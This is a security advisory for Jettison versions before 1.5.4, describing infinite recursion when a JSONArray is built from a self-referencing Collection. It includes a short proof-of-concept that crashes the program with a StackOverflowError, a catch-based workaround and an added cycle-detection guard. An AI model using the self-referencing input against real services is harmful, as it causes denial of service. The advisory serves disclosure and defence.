Infinite recursion in Jettison leads to denial of service when creating a crafted JSONArray
Affected package: org.codehaus.jettison:jettison
Affected versions: (,1.5.4)
An infinite recursion is triggered in Jettison when a JSONArray is constructed from a Collection that contains a reference to itself in one of its elements. The recursion never terminates, so a StackOverflowError is thrown.
import java.util.ArrayList;
import org.codehaus.jettison.json.JSONArray;
import org.codehaus.jettison.json.JSONException;

public class POC {
    public static void main(String[] args) throws JSONException {
        ArrayList<Object> list = new ArrayList<>();
        list.add(list); // the list now contains itself
        // JSONArray(Collection) descends into nested Collections, so it re-enters
        // itself on the same list until the stack is exhausted
        JSONArray jsonArray = new JSONArray(list);
    }
}
Workaround: wrap the call to Jettison's JSONArray constructor in exception handling that catches the StackOverflowError:

    try {
        JSONArray jsonArray = new JSONArray(list);
    } catch (StackOverflowError e) {
        // the recursion has already exhausted the thread's stack by the time this runs
        System.err.println("ERROR: Stack limit reached");
    }
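Catching StackOverflowError only reacts after the stack has already been exhausted. A cheaper defence for callers that must stay on an affected version is to refuse cyclic input before it reaches the constructor. The following is an added example, not Jettison's own code; the class name CycleGuard and the method names are assumptions, and it descends only into Collections and Maps, the types the constructor converts recursively.

```java
import java.util.Collection;
import java.util.Collections;
import java.util.IdentityHashMap;
import java.util.Map;
import java.util.Set;
import org.codehaus.jettison.json.JSONArray;
import org.codehaus.jettison.json.JSONException;

// Added example, not Jettison's own code: reject cyclic object graphs
// before an affected JSONArray constructor can start recursing on them.
public final class CycleGuard {
    /** Builds a JSONArray, failing fast if the input refers back to itself. */
    public static JSONArray toJsonArray(Collection<?> input) throws JSONException {
        if (containsCycle(input)) {
            throw new IllegalArgumentException("refusing cyclic input");
        }
        return new JSONArray(input);
    }

    public static boolean containsCycle(Object root) {
        // Identity-based set: equals()/hashCode() on a self-referencing
        // list would themselves recurse without end.
        return walk(root, Collections.newSetFromMap(new IdentityHashMap<>()));
    }

    private static boolean walk(Object node, Set<Object> path) {
        Iterable<?> children;
        if (node instanceof Collection) {
            children = (Collection<?>) node;
        } else if (node instanceof Map) {
            children = ((Map<?, ?>) node).values();
        } else {
            return false;                  // scalar: nothing to recurse into
        }
        if (!path.add(node)) return true;  // already on the current path: cycle
        try {
            for (Object child : children) {
                if (walk(child, path)) return true;
            }
        } finally {
            path.remove(node);             // shared (DAG) references stay legal
        }
        return false;
    }

    public static void main(String[] args) throws JSONException {
        java.util.List<Object> list = new java.util.ArrayList<>();
        list.add(list);                    // the advisory's self-referencing input
        toJsonArray(list);                 // rejected by the guard, stack untouched
    }
}
```

The guard tracks only the current path, so the same object reachable through two different branches is accepted; only a reference back to an ancestor is rejected.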
No references are supplied for this issue